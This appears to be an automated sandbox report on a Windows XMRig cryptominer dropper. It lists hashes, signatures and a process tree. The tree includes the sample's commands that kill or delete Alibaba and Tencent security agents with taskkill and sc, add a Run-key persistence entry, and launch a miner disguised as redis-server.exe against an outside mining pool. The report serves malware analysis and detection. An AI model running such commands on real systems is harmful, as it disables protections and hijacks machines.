Analysis
-
max time kernel
140s -
max time network
141s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
04-05-2021 14:34
Static task
static1
Behavioral task
behavioral1
Sample
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Resource
win10v20210408
General
-
Target
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
-
Size
569KB
-
MD5
c85e27470e88ad0d0449ab68ef18d0a3
-
SHA1
4791330c3acf353772c3d073cc52a619eb4cd7cc
-
SHA256
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
-
SHA512
39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
Malware Config
Signatures
-
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/644-95-0x000000013F2D0000-0x000000014023A000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
htttp.exeredis-server.exepid process 1964 htttp.exe 644 redis-server.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 2 IoCs
Processes:
htttp.exepid process 1964 htttp.exe 1732 -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
htttp.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe" htttp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe" htttp.exe -
Drops file in Windows directory 2 IoCs
Processes:
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exedescription ioc process File opened for modification C:\Windows\htttp.exe 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe File created C:\Windows\htttp.exe 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 1472 tasklist.exe 316 tasklist.exe 1072 tasklist.exe 552 tasklist.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1608 taskkill.exe 436 taskkill.exe 1656 taskkill.exe 536 taskkill.exe 824 taskkill.exe 1720 taskkill.exe 916 taskkill.exe 1736 taskkill.exe 2012 taskkill.exe 1320 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeredis-server.exedescription pid process Token: SeDebugPrivilege 1072 tasklist.exe Token: SeDebugPrivilege 552 tasklist.exe Token: SeDebugPrivilege 1472 tasklist.exe Token: SeDebugPrivilege 316 tasklist.exe Token: SeDebugPrivilege 1736 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 2012 taskkill.exe Token: SeDebugPrivilege 1320 taskkill.exe Token: SeDebugPrivilege 436 taskkill.exe Token: SeDebugPrivilege 1656 taskkill.exe Token: SeDebugPrivilege 536 taskkill.exe Token: SeDebugPrivilege 824 taskkill.exe Token: SeDebugPrivilege 1720 taskkill.exe Token: SeDebugPrivilege 916 taskkill.exe Token: SeLockMemoryPrivilege 644 redis-server.exe Token: SeLockMemoryPrivilege 644 redis-server.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exehtttp.execmd.exedescription pid process target process PID 1088 wrote to memory of 1964 1088 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 1088 wrote to memory of 1964 1088 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 1088 wrote to memory of 1964 1088 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 1088 wrote to memory of 1964 1088 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 1964 wrote to memory of 304 1964 htttp.exe cmd.exe PID 1964 wrote to memory of 304 1964 htttp.exe cmd.exe PID 1964 wrote to memory of 304 1964 htttp.exe cmd.exe PID 1964 wrote to memory of 304 1964 htttp.exe cmd.exe PID 304 wrote to memory of 1072 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1072 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1072 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1072 304 cmd.exe tasklist.exe PID 304 wrote to memory of 552 304 cmd.exe tasklist.exe PID 304 wrote to memory of 552 304 cmd.exe tasklist.exe PID 304 wrote to memory of 552 304 cmd.exe tasklist.exe PID 304 wrote to memory of 552 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1472 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1472 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1472 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1472 304 cmd.exe tasklist.exe PID 304 wrote to memory of 316 304 cmd.exe tasklist.exe PID 304 wrote to memory of 316 304 cmd.exe tasklist.exe PID 304 wrote to memory of 316 304 cmd.exe tasklist.exe PID 304 wrote to memory of 316 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1736 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1736 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1736 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1736 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1608 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1608 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1608 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1608 304 cmd.exe taskkill.exe PID 304 wrote to memory of 2012 304 cmd.exe taskkill.exe PID 304 wrote to memory of 2012 304 cmd.exe taskkill.exe PID 304 wrote to memory of 2012 304 cmd.exe taskkill.exe PID 304 wrote to memory of 2012 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1320 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1320 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1320 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1320 304 cmd.exe taskkill.exe PID 304 wrote to memory of 436 304 cmd.exe taskkill.exe PID 304 wrote to memory of 436 304 cmd.exe taskkill.exe PID 304 wrote to memory of 436 304 cmd.exe taskkill.exe PID 304 wrote to memory of 436 304 cmd.exe taskkill.exe PID 304 wrote to memory of 588 304 cmd.exe sc.exe PID 304 wrote to memory of 588 304 cmd.exe sc.exe PID 304 wrote to memory of 588 304 cmd.exe sc.exe PID 304 wrote to memory of 588 304 cmd.exe sc.exe PID 304 wrote to memory of 1488 304 cmd.exe sc.exe PID 304 wrote to memory of 1488 304 cmd.exe sc.exe PID 304 wrote to memory of 1488 304 cmd.exe sc.exe PID 304 wrote to memory of 1488 304 cmd.exe sc.exe PID 304 wrote to memory of 888 304 cmd.exe sc.exe PID 304 wrote to memory of 888 304 cmd.exe sc.exe PID 304 wrote to memory of 888 304 cmd.exe sc.exe PID 304 wrote to memory of 888 304 cmd.exe sc.exe PID 304 wrote to memory of 1604 304 cmd.exe sc.exe PID 304 wrote to memory of 1604 304 cmd.exe sc.exe PID 304 wrote to memory of 1604 304 cmd.exe sc.exe PID 304 wrote to memory of 1604 304 cmd.exe sc.exe PID 304 wrote to memory of 776 304 cmd.exe sc.exe PID 304 wrote to memory of 776 304 cmd.exe sc.exe PID 304 wrote to memory of 776 304 cmd.exe sc.exe PID 304 wrote to memory of 776 304 cmd.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\htttp.exe"C:\Windows\htttp.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\run.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq Ali_update.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq aliyun_assist_service.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq aliyun_assist_update.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq aliyun_installer.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aliyun_assist_service.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aliyun_assist_update.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aliyun_installer.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Ali_update.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AliHids.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc stop "Alibaba Security Aegis Detect Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Alibaba Security Aegis Update Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Alibaba Security Aegis Detect Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Alibaba Security Aegis Update Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "BaradAgentSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "StargateSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "QPCore"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "BaradAgentSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "StargateSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "QPCore"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QQProtect.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sgagent.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BaradAgent.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YDLive.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YDService.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\redis-server.exe"C:\Users\Admin\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\redis-server.exeMD5
0c4ae60bb07bd7c084ca66b844fa0b4b
SHA1ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
SHA25631cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
SHA5125dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d
-
C:\Users\Admin\AppData\Local\Temp\redis-server.exeMD5
0c4ae60bb07bd7c084ca66b844fa0b4b
SHA1ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
SHA25631cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
SHA5125dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d
-
C:\Users\Admin\AppData\Local\Temp\run.batMD5
f1cc668d01eeb779b1fc1044541fc1d4
SHA145bd782881b31eb2868fc211b19af2cb627a9d0d
SHA25662fdc9b8581a931ac987446ab4c8547bb9f94d9caf8e61c3d0d95ec033e73929
SHA512293263607a850f2bb6873924b6606b83c7ea0dbd9fa07c0d8958be9e64aa1b27e24a0cf213b89906b3919c32da3c265d3ae9df07430ab4441b7289b3e935c33e
-
C:\Windows\htttp.exeMD5
c85e27470e88ad0d0449ab68ef18d0a3
SHA14791330c3acf353772c3d073cc52a619eb4cd7cc
SHA25670f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
SHA51239bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
-
C:\Windows\htttp.exeMD5
c85e27470e88ad0d0449ab68ef18d0a3
SHA14791330c3acf353772c3d073cc52a619eb4cd7cc
SHA25670f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
SHA51239bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
-
\Users\Admin\AppData\Local\Temp\redis-server.exeMD5
0c4ae60bb07bd7c084ca66b844fa0b4b
SHA1ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
SHA25631cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
SHA5125dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d
-
\Users\Admin\AppData\Local\Temp\redis-server.exeMD5
0c4ae60bb07bd7c084ca66b844fa0b4b
SHA1ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
SHA25631cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
SHA5125dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d
-
memory/304-63-0x0000000000000000-mapping.dmp
-
memory/316-69-0x0000000000000000-mapping.dmp
-
memory/436-74-0x0000000000000000-mapping.dmp
-
memory/536-86-0x0000000000000000-mapping.dmp
-
memory/552-66-0x0000000000000000-mapping.dmp
-
memory/588-75-0x0000000000000000-mapping.dmp
-
memory/644-95-0x000000013F2D0000-0x000000014023A000-memory.dmpFilesize
15.4MB
-
memory/644-96-0x0000000000310000-0x0000000000330000-memory.dmpFilesize
128KB
-
memory/644-91-0x0000000000000000-mapping.dmp
-
memory/776-79-0x0000000000000000-mapping.dmp
-
memory/824-87-0x0000000000000000-mapping.dmp
-
memory/888-77-0x0000000000000000-mapping.dmp
-
memory/916-89-0x0000000000000000-mapping.dmp
-
memory/1072-65-0x0000000000000000-mapping.dmp
-
memory/1088-59-0x00000000753B1000-0x00000000753B3000-memory.dmpFilesize
8KB
-
memory/1088-83-0x0000000000000000-mapping.dmp
-
memory/1320-73-0x0000000000000000-mapping.dmp
-
memory/1472-67-0x0000000000000000-mapping.dmp
-
memory/1488-76-0x0000000000000000-mapping.dmp
-
memory/1604-78-0x0000000000000000-mapping.dmp
-
memory/1608-71-0x0000000000000000-mapping.dmp
-
memory/1612-82-0x0000000000000000-mapping.dmp
-
memory/1656-85-0x0000000000000000-mapping.dmp
-
memory/1708-81-0x0000000000000000-mapping.dmp
-
memory/1720-88-0x0000000000000000-mapping.dmp
-
memory/1732-80-0x0000000000000000-mapping.dmp
-
memory/1736-70-0x0000000000000000-mapping.dmp
-
memory/1964-60-0x0000000000000000-mapping.dmp
-
memory/1984-84-0x0000000000000000-mapping.dmp
-
memory/2012-72-0x0000000000000000-mapping.dmp